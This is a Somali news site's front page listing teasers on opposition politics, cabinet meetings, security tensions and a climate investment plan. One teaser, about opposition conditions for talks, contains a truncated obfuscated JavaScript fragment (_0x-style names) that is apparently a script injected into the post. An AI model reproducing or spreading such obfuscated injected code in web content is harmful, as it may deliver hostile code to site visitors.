Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Siyaasiga Cabdi Barre Jabriil oo ka digay in dalka lagu wado jiho halis ah

Muqdisho – Siyaasiga Cabdi Barre Jabriil oo ka mid ah siyaasiyiinta Soomaaliyeed ayaa waraysi gaar ah oo uu siiyey warbaahinta Shabelle kaga hadlay xaaladda...

Mucaaradka oo Shuruud ku xiray ka qeybgalka Shirka uu ku baaqey Madaxweynaha

MUQDISHO, Soomaaliya - Madasha Samatabixinta ee ay ku mideysanyihiin Mucaaradka oo sharuudo adag ku xiray gogosha uu fidiyey markale Xasan Sheekh Maxamuud.   function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return...

Maxaa looga hadlay Shirka Deg Dega ee Gollaha Wasiiradda Soomaaliya?

MUQDISHO, Soomaaliya - Golaha Wasiirrada Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, ayaa maanta yeeshay kulan gaar ah, kaasoo uu guddoominayay Ra’iisul Wasaare ,Mudane Xamsa Cabdi Barre.   Shirka...

Madaxweynaha Soomaaliya oo Ku Dhawaaqay in Wadahadal Qaran Qaban Doono 15-ka June

MUQDISHO, Juun 1  — Madaxweynaha Soomaaliya Xasan Sheekh Maxamuud ayaa Maanta ku dhawaaqay in Wadahadalladii Qaran ee muddo dheer dib u dhacay la qaban...

Mahad Salaad oo markale loo magacaabey Taliyaha Hay’adda NISA

MUQDISHO, Soomaaliya - Golaha Wasiirrada Xukuumadda Jamhuuriyadda Federaalka Soomaaliya oo maanta yeeshay shir deg deg ah, ayaa ansixiyey soo jeedinta Wasaaradda Amniga Gudaha ee...

Mucaaradka Soomaaliyeed oo Soo Saaray War-murtiyeed ku saabsan Xaaladda Dalka

MUQDISHO, 1-da Juun 2025 — Siyaasiyiinta mucaaradka Soomaaliyeed ayaa ku soo gabagabeeyay shir ballaaran oo maalmahan uga socday magaalada Muqdisho, iyagoo ka soo saaray in...

Prof. Diini oo Eedeyn Culus U Jeediyey Dowladda Federaalka Soomaaliya

MUQDISHO, 1-da Juun 2025 – Guddoomiyaha ururrada bulshada rayidka ah, Prof. Diini, ayaa xalay qudbad kulul ka jeediyay munaasabad lagu soo xirayay shir ay mucaaradku...

Madaxweyne Xasan Sheekh oo Khadka Taleefanka kula hadlay Madaxweyne Erdogan

MUQDISHO, Soomaaliya - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Xasan Sheekh Maxamuud, ayaa galabta khadka taleefanka kula hadlay Madaxweynaha Jamhuuriyadda Turkiga, Rajab Dayib Erdogan.   Wadahadallada labada hoggaan...

Dhaqdhaqaaqyo Ciidan oo ka socda xadka Hiiraan iyo Shabeellaha Dhexe xilli cabsi laga qabo...

BELEDWEYNE - Wararka naga soo gaaraya dhulka xadka ah ee u dhexeeya gobollada Hiiraan iyo Shabeellaha Dhexe ayaa sheegaya in ay ka socdaan dhaqdhaqaaqyo...

Xiisad ka taagan degmada Garasbaaleey ee Gobolka Banaadir

GARASBAALEY - Degmada Garasbaaleey ee Koonfurta Muqdisho ayaa waxaa ka taagan xiisad ka dhalatay falal lagu eedeeyay in ay ku kacayeen rag la sheegay...

WARAR KALE

Somali clan elder accuses Kenya of sheltering Laftagareen and associates linked to Al-Shabaab

MOGADISHU, Somalia — A prominent elder from Somalia’s Mudulood clan has accused Kenya of hosting Abdiaziz Hassan Mohamed Laftagareen and his associates, whom he...

Soomaaliya oo daahfurtay qorshe maalgashi cimilo oo ku kacaya $12.8 bilyan

ANTALYA — Madaxweynaha Soomaaliya Xasan Sheekh Maxamuud ayaa magaalada Antalya ee dalka Turkiga ka daahfuray Qorshaha Maalgashiga Qaranka ee Hindisaha Saddexaad ee Wax-ka-qabashada Isbeddelka...

Somalia launches $12.8 billion climate investment plan in Antalya

ANTALYA, Turkey — Somali President Hassan Sheikh Mohamud on Wednesday launched a national climate investment plan requiring an estimated $12.8 billion over the next...